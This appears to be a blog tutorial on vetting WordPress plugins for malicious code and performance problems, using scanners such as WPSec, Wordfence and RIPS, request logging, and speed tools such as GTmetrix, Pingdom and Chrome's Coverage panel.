Plugins can bring many advantages to your WordPress website. However, you should consider carefully before using one because it may contain viruses and malicious codes. They also may affect your website loading speed/performance. To check if a plugin has an issue, especially for a newly launched plugin, you can use various useful tools and follow the steps below.
But first, don't rush to install the plugin on your website. Let's choose another site to test the plugin's safety and performance.
Check the Safety of a WordPress Plugin
Using Online Tools
WPSec is a powerful tool to scan your WordPress site to see if it is protected from threats.
First, go to this site, then enter the website address and click Start Scan.
After finishing the scanning process, this tool will give you the results to see if your page is safe, and how many dangerous elements are there. For example, my site is quite secure. It means that there is no issue with the plugins used on my site.
To regularly receive notifications about your website security warnings, you can sign up for an account (it’s free) on WPSec.
By doing these steps above, you can regularly check if your website has any issue or if your using plugins affect your website.
Using Another Plugin
Using a plugin to test another plugin sounds weird, but it really makes sense.
You should choose some credible plugins such as Wordfence Security and Log HTTP Requests.
Wordfence Security is one of the most famous plugins in detecting and eradicating malicious codes on WordPress websites. You just need to install and activate Wordfence Security for free from the Dashboard. After activating the plugin, a new Wordfence menu appears. Go to it and you will see the interface of Wordfence Security as below. Then, click Start New Scan.
Wait a short time for the plugin’s scanning. And then, it will list the issues which you have on your site, including ones from plugins. Click on the magnifier icon to see the details.
For example, the Meta Box plugin has no concern about malware problems. You only need to update it to the latest version. If there are other troubles, Wordfence Security will notify you. After that, you can consider whether to use the plugin or not.
Next, if you use the Log HTTP Requests plugin to check, you will see which are being sent from your website including all the HTTP requests, AJAX requests, as well as your website data.
Once installed, the plugin will log the data of requests. You can go to Tools > Log HTTP Request to see them:
From these records, you will know which kind of data will be sent or received by the plugin. Spend time checking them to make sure that the plugin does not leak your important data or get something weird.
Detecting Unusual Code in the Plugin
Finally, you should check if there is any unusual code in the plugin or if it connects to other sites.
For example, if your plugin contains codes like this, you should reconsider using it:
Using RIPS Scanner
You can use the RIPS Scanner to check if your plugin is null or contains malicious code. RIPS will scan, check PHP files, and then notify you about the plugin’s issues. Here are the steps to use RIPS for scanning:
- Step 1: Download the tool here;
- Step 2: Extract the tool to the web root directory;
- Step 3: Go to domain/rips to scan.
Check If the Plugin Slows Down the Site
GTmetrix and Pingdom are the top of mind tools to check if a plugin is slowing down your site. But note that these tools do not list which plugins are causing your website performance issues. So, you also should go to the plugin’s CSS/JS files to check whether the issues are from the plugin or not as well.
Using GTmetrix
Go to GTmetrix and enter your website’s URL, then click Test Your Site and wait for a while for the scanning.
When the scanning process finishes, scroll down to the Top Issues section. You will see the issues listed from High (which affects page speed the most), Med-Low (which affects page speed on average), and Low (which affects the page speed just a little bit). Let's see if some of them are from the plugin that you are using. To learn more about every issue, you can click on the arrow next to it.
Using Pingdom
Enter your website domain on Pingdom as well. Wait and scroll down to the Improve Page Performance section, the tool will evaluate and give you scores for the site speed from 0 to 100. Then, click on the arrow icon next to the sections with low scores to find out where the problem is.
Check for Unused CSS/JS Files
In addition to using the two above tools, you can take advantage of the browser's console to view the plugin's resources (CSS/JS files).
You can enable the coverage tool in Chrome Dev tools > select the three-dot button > More tools > Coverage and see if there are unused CSS/JS files.
If there are any unused files, you should remove them. I have a tutorial on deleting unused CSS/JS files here, follow it to know-how.
Other Methods
If you hire a developer to create a plugin for you and the plugin has not been uploaded to wordpress.org, you can try to upload it. This team will review the plugin carefully. Wow, just a small trick but it may take a lot of time.
Alternatively, you can try joining some communities to ask someone, even experienced developers, to test it out.
The Last Words
You see, there are many ways to check if a plugin affects the speed or security of your WordPress website. No matter which tool you are using to test, try to leverage them well to check the plugin carefully.
In particular, choosing plugins developed by reliable and credible companies or developers is quite an ideal way. Remember to update the plugin regularly as well to have its best version with the highest security.
